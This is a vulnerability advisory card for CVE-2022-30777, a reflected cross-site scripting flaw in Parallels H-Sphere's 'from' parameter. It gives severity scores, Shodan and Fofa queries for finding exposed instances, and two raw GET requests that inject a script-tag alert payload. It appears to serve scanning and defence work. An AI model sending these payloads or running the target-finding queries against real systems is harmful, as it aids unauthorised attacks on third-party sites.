| Title | Parallels H-Sphere 3.6.1713 - Cross-Site Scripting |
|---|---|
| Author | 3th1c_yuk1 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Apply the latest security patch or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.04147 |
| CVE ID | CVE-2022-30777 |
| CWE ID | CWE-79 |
| Shodan Query | title:"h-sphere"http.title:"h-sphere"http.title:"parallels h-sphere" |
| Fofa Query | title="h-sphere"title="parallels h-sphere" |
| Tags | cve cve2022 parallels hsphere xss vuln |
Parallels H-Sphere 3.6.1713 contains a cross-site scripting vulnerability via the index_en.php ‘from’ parameter.
GET /index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-30777.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-30777.pcap
N/AN/A